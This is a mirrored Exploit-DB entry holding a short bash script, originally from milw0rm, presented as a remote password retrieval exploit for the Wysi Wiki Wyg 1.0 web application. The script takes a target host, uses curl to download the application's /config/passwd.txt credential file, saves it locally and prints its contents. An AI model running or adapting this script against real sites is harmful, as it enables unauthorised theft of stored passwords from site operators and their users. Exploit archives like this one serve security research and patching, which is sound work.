exploit-db-mirror/exploits/php/webapps/7434.sh
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

19 lines
No EOL
395 B
Bash
Executable file

#!/bin/bash
# Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
# by athos - staker[at]hotmail[dot]it
host=$1;
name=$2;
path='/config/passwd.txt';
if [ "$name" = "" ]; then
echo "Usage: bash $0 [host/path] [filename]";
echo "by athos - staker[at]hotmail[dot]it";
exit;
fi;
curl $host/$path > $name;
clear
cat $name;
# milw0rm.com [2008-12-12]